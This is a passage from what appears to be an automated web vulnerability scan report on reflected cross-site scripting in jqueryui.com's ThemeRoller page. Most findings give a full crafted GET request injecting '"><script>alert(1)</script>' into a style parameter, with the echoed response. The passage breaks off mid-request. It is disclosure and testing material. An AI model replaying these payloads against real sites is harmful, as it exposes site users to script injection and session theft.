Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121e7834"><script>alert(1)</script>35a9a1124a8&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

4.620. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload c18bf"><script>alert(1)</script>445200790c3 was submitted in the fcContent parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222c18bf"><script>alert(1)</script>445200790c3&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222c18bf"><script>alert(1)</script>445200790c3&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

4.621. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload 8eb74"><script>alert(1)</script>eed56a15338 was submitted in the fcDefault parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555558eb74"><script>alert(1)</script>eed56a15338&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555558eb74"><script>alert(1)</script>eed56a15338&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

4.622. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload af1b1"><script>alert(1)</script>62cef94653f was submitted in the fcError parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaf1b1"><script>alert(1)</script>62cef94653f&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaf1b1"><script>alert(1)</script>62cef94653f&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

4.623. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload f9d06"><script>alert(1)</script>26968f44dc0 was submitted in the fcHeader parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f9d06"><script>alert(1)</script>26968f44dc0&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f9d06"><script>alert(1)</script>26968f44dc0&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

4.624. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload cf963"><script>alert(1)</script>72faaf79734 was submitted in the fcHighlight parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636cf963"><script>alert(1)</script>72faaf79734&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636cf963"><script>alert(1)</script>72faaf79734&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

4.625. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload c9d5c"><script>alert(1)</script>421aee9aa0f was submitted in the fcHover parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c9d5c"><script>alert(1)</script>421aee9aa0f&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c9d5c"><script>alert(1)</script>421aee9aa0f&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

4.626. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the query string of the href of the <link rel="stylesheet"> element that loads /themeroller/css/parseTheme.css.php. The payload d3ec5"><script>alert(1)</script>90d72c19db1 was submitted in the ffDefault parameter and was echoed unmodified. Its leading "> closes the href value and the link tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serifd3ec5"><script>alert(1)</script>90d72c19db1&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serifd3ec5"><script>alert(1)</script>90d72c19db1&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

4.627. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the query string of the href of the <link rel="stylesheet"> element that loads /themeroller/css/parseTheme.css.php. The payload 8ae8b"><script>alert(1)</script>06aa04249d4 was submitted in the fsDefault parameter and was echoed unmodified. Its leading "> closes the href value and the link tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em8ae8b"><script>alert(1)</script>06aa04249d4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em8ae8b"><script>alert(1)</script>06aa04249d4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

4.628. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 9cc66"><script>alert(1)</script>b02328b292f was submitted in the fwDefault parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal9cc66"><script>alert(1)</script>b02328b292f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorE